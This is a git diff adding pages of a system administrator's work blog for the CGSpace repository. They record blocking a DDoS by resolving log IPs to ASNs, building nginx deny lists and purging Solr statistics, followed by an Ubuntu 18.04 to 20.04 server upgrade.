+62.76.232.218, Fine Group Servers Solutions LLC, finegroupservers.com, 62.76.232.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+147.78.183.221, TrafficTransitSolution LLC, traffictransitsolution.us, 147.78.183.0/24 (Net-traffictransitsolution-60)
+94.158.22.202, Auction LLC, dauction.ru / info@traffictransitsolution.us, 94.158.22.0/24 (FR-QN-20180917)
+85.202.194.33, Mosnet LLC, mosnet.ru / info@traffictransitsolution.us, 85.202.194.0/24 (DE-QN-20180917)
+193.187.93.150, Fine Group Servers Solutions LLC, finegroupservers.com, 193.187.92.0/22 (FTL3)
+185.250.45.149, Dmitry Vorozhtsov, mgn-host.ru / abuse@fitz-isp.uk, 185.250.44.0/23 (GB-FITZISP-20181106)
+185.50.251.75, ATOMOHOST LLC, atomohost.com, 185.50.251.0/24 (Silverstar_Invest_Limited)
+5.183.254.117, TrafficTransitSolution LLC, traffictransitsolution.us, 5.183.254.0/24 (Net-traffictransitsolution-31)
+45.132.186.187, TrafficTransitSolution LLC, traffictransitsolution.us, 45.132.186.0/24 (Net-traffictransitsolution-7)
+83.171.252.105, Teleport LLC, teleport.az / abuse@blockchainnetworksolutions.co.uk, 83.171.252.0/23 (DE-FTNET-252)
+45.148.127.37, TrafficTransitSolution LLC, traffictransitsolution.us, 45.148.127.0/24 (Net-traffictransitsolution-16)
+194.87.115.133, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.115.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+193.233.250.100, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.250.0/24 (TrafficTransitSolutionNet)
+194.87.116.246, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.116.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+195.133.25.244, Fine Group Servers Solutions LLC, finegroupservers.com, 195.133.25.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+77.220.194.159, Fine Group Servers Solutions LLC, finegroupservers.com, 77.220.194.0/24 (Net-finegroupservers-3)
+185.89.101.177, ATOMOHOST LLC, atomohost.com, 185.89.100.0/23 (QUALITYNETWORK)
+193.151.191.133, Alax LLC, alaxona.com / info@finegroupservers.com, 193.151.191.0/24 (FINEGROUPSERVERS-LEASE)
+5.181.170.147, Fine Group Servers Solutions LLC, finegroupservers.com, 5.181.170.0/24 (Net-finegroupservers-7)
+193.233.249.167, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.249.0/24 (TrafficTransitSolutionNet)
+46.161.59.90, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru, 46.161.59.0/24 (FineTransitJP)
+213.108.3.74, TrafficTransitSolution LLC, traffictransitsolution.us, 213.108.3.0/24 (Net-traffictransitsolution-24)
+193.233.251.238, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.251.0/24 (TrafficTransitSolutionNet)
+178.20.215.224, Alaxona Internet Inc., alaxona.com / info@finegroupservers.com, 178.20.215.0/24 (FINEGROUPSERVERS-LEASE)
+45.159.22.199, Server LLC, ixserv.ru / info@finegroupservers.com, 45.159.22.0/24 (FINEGROUPSERVERS-LEASE)
+109.236.53.244, Mosnet LLC, mosnet.ru, info@traffictransitsolution.us, 109.236.53.0/24 (TR-NET-53)
+</code></pre><ul>
+<li>I found a better way to get the ASNs using my <code>resolve-addresses-geoip2.py</code> script
+<ul>
+<li>First, get a list of all IPs making requests to nginx today:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq  &gt; /tmp/ips-sorted.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/ips-sorted.txt 
+</span></span><span style="display:flex;"><span>10776 /tmp/ips-sorted.txt
+</span></span></code></pre></div><ul>
+<li>Then resolve them all:</li>
+</ul>
+<pre tabindex="0"><code class="language-console:" data-lang="console:">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
+</code></pre><ul>
+<li>Then get the top 10 organizations and top ten ASNs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
+</span></span><span style="display:flex;"><span>    213 AMAZON-AES
+</span></span><span style="display:flex;"><span>    218 ASN-QUADRANET-GLOBAL
+</span></span><span style="display:flex;"><span>    246 Silverstar Invest Limited
+</span></span><span style="display:flex;"><span>    347 Ethiopian Telecommunication Corporation
+</span></span><span style="display:flex;"><span>    475 DEDIPATH-LLC
+</span></span><span style="display:flex;"><span>    504 AS-COLOCROSSING
+</span></span><span style="display:flex;"><span>    598 UAB Rakrejus
+</span></span><span style="display:flex;"><span>    814 UGB Hosting OU
+</span></span><span style="display:flex;"><span>   1010 ST-BGP
+</span></span><span style="display:flex;"><span>   1757 Global Layer B.V.
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">3</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
+</span></span><span style="display:flex;"><span>    213 14618
+</span></span><span style="display:flex;"><span>    218 8100
+</span></span><span style="display:flex;"><span>    246 35624
+</span></span><span style="display:flex;"><span>    347 24757
+</span></span><span style="display:flex;"><span>    475 35913
+</span></span><span style="display:flex;"><span>    504 36352
+</span></span><span style="display:flex;"><span>    598 62282
+</span></span><span style="display:flex;"><span>    814 206485
+</span></span><span style="display:flex;"><span>   1010 46844
+</span></span><span style="display:flex;"><span>   1757 49453
+</span></span></code></pre></div><ul>
+<li>I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I&rsquo;m concerned about Global Layer because it&rsquo;s a huge ASN that seems to have legit hosts too&hellip;?</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
+</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
+</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
+</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
+</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
+</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
+</span></span><span style="display:flex;"><span>$ cat AS* | sort | uniq &gt; /tmp/abusive-networks.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/abusive-networks.txt 
+</span></span><span style="display:flex;"><span>2276 /tmp/abusive-networks.txt
+</span></span></code></pre></div><ul>
+<li>Combining with my existing rules and filtering uniques:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>2298
+</span></span></code></pre></div><ul>
+<li><a href="https://scamalytics.com/ip/isp/2021-06">According to Scamalytics all these are high risk ISPs</a> (as recently as 2021-06) so I will just keep blocking them</li>
+<li>I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through&hellip; sigh</li>
+<li>The next thing I need to do is purge all the IPs from Solr using grepcidr&hellip;</li>
+</ul>
+<h2 id="2021-07-18">2021-07-18</h2>
+<ul>
+<li>After blocking all the ASN network blocks yesterday I still see requests getting through from these abusive networks, so the ASN lists must be out of date
+<ul>
+<li>I decided to get a lit of all the IPs that made requests on the server in the last two days, resolve them, and then filter out those from these ASNs: 206485, 35624, 36352, 46844, 49453, 62282</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/all-ips-to-block.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/all-ips-to-block.txt 
+</span></span><span style="display:flex;"><span>5095 /tmp/all-ips-to-block.txt
+</span></span></code></pre></div><ul>
+<li>Then I added them to the normal ipset we are already using with firewalld
+<ul>
+<li>I will check again in a few hours and ban more</li>
+</ul>
+</li>
+<li>I decided to extract the networks from the GeoIP database with <code>resolve-addresses-geoip2.py</code> so I can block them more efficiently than using the 5,000 IPs in an ipset:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/all-networks-to-block.txt
+</span></span><span style="display:flex;"><span>$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>2354
+</span></span></code></pre></div><ul>
+<li>Combined with the previous networks this brings about 200 more for a total of 2,354 networks
+<ul>
+<li>I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from <a href="https://www.spamhaus.org/drop/">Spamhaus&rsquo;s DROP and EDROP lists</a>, for example)</li>
+</ul>
+</li>
+<li>Then I got a list of all the 5,095 IPs from above and used <code>check-spider-ip-hits.sh</code> to purge them from Solr:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>Total number of bot hits purged: 197116
+</span></span></code></pre></div><ul>
+<li>I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level</li>
+</ul>
+<h2 id="2021-07-20">2021-07-20</h2>
+<ul>
+<li>Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, it&rsquo;s much higher than I noticed yesterday:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5643
+</span></span></code></pre></div><ul>
+<li>I purged 27,000 more hits from the Solr stats using this new list of IPs with my <code>check-spider-ip-hits.sh</code> script</li>
+<li>Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips-june-23.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">15</span>
+</span></span><span style="display:flex;"><span>    265 GOOGLE,15169
+</span></span><span style="display:flex;"><span>    277 Silverstar Invest Limited,35624
+</span></span><span style="display:flex;"><span>    280 FACEBOOK,32934
+</span></span><span style="display:flex;"><span>    288 SAFARICOM-LIMITED,33771
+</span></span><span style="display:flex;"><span>    399 AMAZON-AES,14618
+</span></span><span style="display:flex;"><span>    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
+</span></span><span style="display:flex;"><span>    455 Opera Software AS,39832
+</span></span><span style="display:flex;"><span>    481 MTN NIGERIA Communication limited,29465
+</span></span><span style="display:flex;"><span>    502 DEDIPATH-LLC,35913
+</span></span><span style="display:flex;"><span>    506 AS-COLOCROSSING,36352
+</span></span><span style="display:flex;"><span>    602 UAB Rakrejus,62282
+</span></span><span style="display:flex;"><span>    822 ST-BGP,46844
+</span></span><span style="display:flex;"><span>    874 Ethiopian Telecommunication Corporation,24757
+</span></span><span style="display:flex;"><span>    912 UGB Hosting OU,206485
+</span></span><span style="display:flex;"><span>   1607 Global Layer B.V.,49453
+</span></span></code></pre></div><ul>
+<li>Again it was over 5,000 IPs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
+</span></span><span style="display:flex;"><span>5228
+</span></span></code></pre></div><ul>
+<li>Interestingly, it seems these are five thousand <em>different</em> IP addresses than the attack from last weekend, as there are over 10,000 unique ones if I combine them!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>10458
+</span></span></code></pre></div><ul>
+<li>I purged all the (26,000) hits from these new IP addresses from Solr as well</li>
+<li>Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)&hellip;
+<ul>
+<li>Also, I took a closer look at QuadraNet (AS8100) and found some association with ATOMOHOST LLC and finegroupservers.com and traffictransitsolution.us, so now I need to block/purge that ASN too!</li>
+<li>I saw it on the <a href="https://scamalytics.com/ip/isp/2021-06">Scamalytics 2021-06</a> list anyways, so at this point I have no doubt</li>
+</ul>
+</li>
+<li>Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ddos-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/ddos-ips.txt 
+</span></span><span style="display:flex;"><span>54002 /tmp/ddos-ips.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ddos-ips-to-purge.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-ips-to-purge.txt
+</span></span><span style="display:flex;"><span>10900 /tmp/ddos-ips-to-purge.txt
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/ddos-networks-to-block.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-networks-to-block.txt
+</span></span><span style="display:flex;"><span>262 /tmp/ddos-networks-to-block.txt
+</span></span></code></pre></div><ul>
+<li>The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>https://asn.ipinfo.app/api/text/nginx/AS46844 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS206485 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS62282 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS36352 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35913 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35624 \
+</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS8100
+</span></span><span style="display:flex;"><span>$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>4007
+</span></span></code></pre></div><ul>
+<li>I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs</li>
+</ul>
+<h2 id="2021-07-22">2021-07-22</h2>
+<ul>
+<li>Udana emailed to say that the link to the iwmi.csv export isn&rsquo;t working
+<ul>
+<li>I looked and both the nginx config and systemd service unit were using invalid paths&hellip;</li>
+<li>I&rsquo;m not sure why it had been working for so long until now!</li>
+</ul>
+</li>
+<li>Maria Garruccio asked if we can move the &ldquo;Context&rdquo; menu up to the top of the right-hand sidebar navigation menu
+<ul>
+<li>The last time we changed this was in 2020 (XMLUI&rsquo;s <code>Navigation.java</code>), and I think it makes a lot of sense so I moved it up, under the account block:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2021/07/context-navigation-menu.png" alt="CGSpace XMLUI navigation"></p>
+<h2 id="2021-07-23">2021-07-23</h2>
+<ul>
+<li>Spend some time reviewing patches for the upcoming DSpace 6.4 release</li>
+</ul>
+<h2 id="2021-07-24">2021-07-24</h2>
+<ul>
+<li>Spend some time reviewing patches for the upcoming DSpace 6.4 release</li>
+<li>Run all system updates on DSpace Test (linode26) and reboot it</li>
+</ul>
+<h2 id="2021-07-29">2021-07-29</h2>
+<ul>
+<li>I figured out why <a href="https://github.com/ilri/OpenRXV/issues/62">come communities / collections were seemingly missing from AReS</a>
+<ul>
+<li>It was not related to harvesting, but rather to our value mappings replacing values like &ldquo;CGIAR Research Program on Livestock&rdquo; with &ldquo;Livestock&rdquo;</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-08/index.html b/docs/2021-08/index.html
new file mode 100644
index 000000000..98dfe3185
--- /dev/null
+++ b/docs/2021-08/index.html
@@ -0,0 +1,660 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2021" />
+<meta property="og:description" content="2021-08-01
+
+Update Docker images on AReS server (linode20) and reboot the server:
+
+# docker images | grep -v ^REPO | sed &#39;s/ \&#43;/:/g&#39; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
+I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-08/" />
+<meta property="article:published_time" content="2021-08-01T09:01:07+03:00" />
+<meta property="article:modified_time" content="2021-09-02T17:06:28+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2021"/>
+<meta name="twitter:description" content="2021-08-01
+
+Update Docker images on AReS server (linode20) and reboot the server:
+
+# docker images | grep -v ^REPO | sed &#39;s/ \&#43;/:/g&#39; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
+I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-08/",
+  "wordCount": "3195",
+  "datePublished": "2021-08-01T09:01:07+03:00",
+  "dateModified": "2021-09-02T17:06:28+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-08/">
+
+    <title>August, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-08/">August, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-08-01T09:01:07+03:00">Sun Aug 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-08-01">2021-08-01</h2>
+<ul>
+<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
+</ul>
+<ul>
+<li>First running all existing updates, taking some backups, checking for broken packages, and then rebooting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt dist-upgrade
+</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
+</span></span><span style="display:flex;"><span># check <span style="color:#66d9ef">for</span> any packages with residual configs we can purge
+</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span>
+</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
+</span></span><span style="display:flex;"><span># dpkg -C
+</span></span><span style="display:flex;"><span># dpkg -l &gt; 2021-08-01-linode20-dpkg.txt
+</span></span><span style="display:flex;"><span># tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
+</span></span><span style="display:flex;"><span># reboot
+</span></span><span style="display:flex;"><span># sed -i <span style="color:#e6db74">&#39;s/bionic/focal/&#39;</span> /etc/apt/sources.list.d/*.list
+</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">do</span>-release-upgrade
+</span></span></code></pre></div><ul>
+<li>&hellip; but of course it hit <a href="https://bugs.launchpad.net/ubuntu/+source/libxcrypt/+bug/1903838">the libxcrypt bug</a></li>
+<li>I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt install -f
+</span></span><span style="display:flex;"><span># apt dist-upgrade
+</span></span><span style="display:flex;"><span># reboot
+</span></span></code></pre></div><ul>
+<li>After rebooting I purged all packages with residual configs and cleaned up again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
+</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
+</span></span></code></pre></div><ul>
+<li>Then I cleared my local Ansible fact cache and re-ran the <a href="https://github.com/ilri/rmg-ansible-public">infrastructure playbooks</a></li>
